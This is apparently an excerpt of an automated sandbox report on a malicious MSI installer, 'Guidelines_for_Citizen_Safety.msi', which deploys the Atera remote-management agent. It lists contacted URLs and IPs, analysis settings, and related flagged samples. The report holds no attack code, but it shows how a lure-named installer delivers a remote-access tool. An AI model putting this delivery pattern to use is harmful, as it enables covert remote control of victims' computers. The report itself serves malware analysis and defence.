                                                                                                                                                                  http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://agent-api.atera.com/Production/Agent/AcknowledgeCommands0HAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.1/AgentPackageTicketing.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://agent-api.atera.comAgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://agent-api.atera.com/Production/Agent/AgentStartingAteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B41000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://www.w3.ohAteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://agent-api.atera.com/Production/Agent/GetCommandsAteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3f74bb1-6c6f-4d46-bcd1-dababeae95b1AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bb33ca5-3446-47a7-8747-dbbe274b3fa8AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://agent-api.atera.com/rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://agent-api.atera.com/Production/Agent/GetRecurringPackagesAteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://www.newtonsoft.com/jsonschemaNewtonsoft.Json.dll.18.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-1pAteraAgent.exe, 0000000F.00000002.2638383365.000001889778F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://ps.atera.com/agentpackagesmac/AgentPackageRuntimeInstaller/1.5/AgentPackageRuntimeInstaller.AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b619f5c8-c13b-4e86-88e3-ba75e0e2aa5fAteraAgent.exe, 0000000F.00000002.2638383365.000001889778F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=03f53b61-ad6b-486d-8509-b0e195faf765AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.zAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip0HAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.6/AgentPackageUpgradeAgent.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://ps.atera.com/agentpackagesmac/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://ps.atera.com/agentpackagesnet45/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://www.newtonsoft.com/jsonrundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://agent-api.atera.com/Production/Agent/AgeAteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://wixtoolset.org/news/rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbfSystem.ValueTuple.dll.2.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ceAteraAgent.exe, 0000000F.00000002.2638383365.0000018897C55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformationAteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/20.9/AgentPackageOsUpdates.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://agent-api.aterDrundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscoveryAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9d2bb483-a1d5-41c5-b567-c3f48ab6ed2cAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://agent-api.atera.com/Production/Agent/AcknowledgeCommandsAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/38.0/AgentPackageAgentInformationAteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                https://agent-api.PAteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                  http://www.w3.oAteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                                    https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                      108.158.75.93
                                                                                                                                                                                                                                                      		d25btwd9wax8gu.cloudfront.netUnited States
                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                      13.232.67.198
                                                                                                                                                                                                                                                      		ps.pndsn.comUnited States
                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse

                                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                      Analysis ID:1561804
                                                                                                                                                                                                                                                      Start date and time:2024-11-24 11:14:11 +01:00
                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                      Overall analysis duration:0h 10m 27s
                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:28
                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                      Sample name:Guidelines_for_Citizen_Safety.msi
                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                      Classification:mal88.troj.spyw.evad.winMSI@37/86@13/2
                                                                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                      • Successful, ratio: 76%
                                                                                                                                                                                                                                                      • Number of executed functions: 422
                                                                                                                                                                                                                                                      • Number of non-executed functions: 3
                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                      • Found application associated with file extension: .msi

                                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 40.81.94.65, 40.119.152.241, 178.79.238.0, 192.229.221.95
                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): crl.edge.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, cacerts.digicert.com, agentsapi.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, atera-agent-api-eu.westeurope.cloudapp.azure.com, ocsp.edge.digicert.com, azureedge-t-prod.trafficmanager.net, crl3.digicert.com, crl4.digicert.com, wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 5852 because it is empty
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 6992 because it is empty
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7332 because it is empty
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target AteraAgent.exe, PID 6216 because it is empty
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target AteraAgent.exe, PID 7400 because it is empty
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target rundll32.exe, PID 4308 because it is empty
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target rundll32.exe, PID 7832 because it is empty
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target rundll32.exe, PID 7892 because it is empty
                                                                                                                                                                                                                                                      • Execution Graph export aborted for target rundll32.exe, PID 8000 because it is empty
                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                      • VT rate limit hit for: Guidelines_for_Citizen_Safety.msi

                                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                                      05:15:28API Interceptor2x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                                                                      05:15:35API Interceptor1686525x Sleep call for process: AteraAgent.exe modified
                                                                                                                                                                                                                                                      05:16:02API Interceptor3x Sleep call for process: AgentPackageAgentInformation.exe modified

                                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      ps.pndsn.comBOMB-762.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 35.157.63.227
                                                                                                                                                                                                                                                      9rSeCZbjZE.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 35.157.63.229
                                                                                                                                                                                                                                                      Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 35.157.63.229
                                                                                                                                                                                                                                                      Lisect_AVT_24003_G1B_84.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 35.157.63.227
                                                                                                                                                                                                                                                      forumapp.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 35.157.63.228
                                                                                                                                                                                                                                                      VANTAGENS_BBCLIENTES00001S4D444400000S.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 35.157.63.227
                                                                                                                                                                                                                                                      2cFFfHDG7D.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 35.157.63.229
                                                                                                                                                                                                                                                      2503.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 54.175.191.204
                                                                                                                                                                                                                                                      Salary.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 54.175.191.203
                                                                                                                                                                                                                                                      https://kinneretacil.egnyte.com/fl/gRykrFURtEGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      • 54.175.191.203
                                                                                                                                                                                                                                                      bg.microsoft.map.fastly.netzapret.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                                                      canva.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousJasonRATBrowse
                                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                                      4yOuoT4GFy.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                                                      6xQ8CMUaES.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                                      1732382826559c62d8b84c02e95636f46212b9f803082b7868187644fff4926ca8a53349c1874.dat-decoded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                                                      17323828261cfef277a3375a886445bf7f5a834ebb1cc85e533e9ac93595cd0e56ebd12426132.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 146.75.30.172
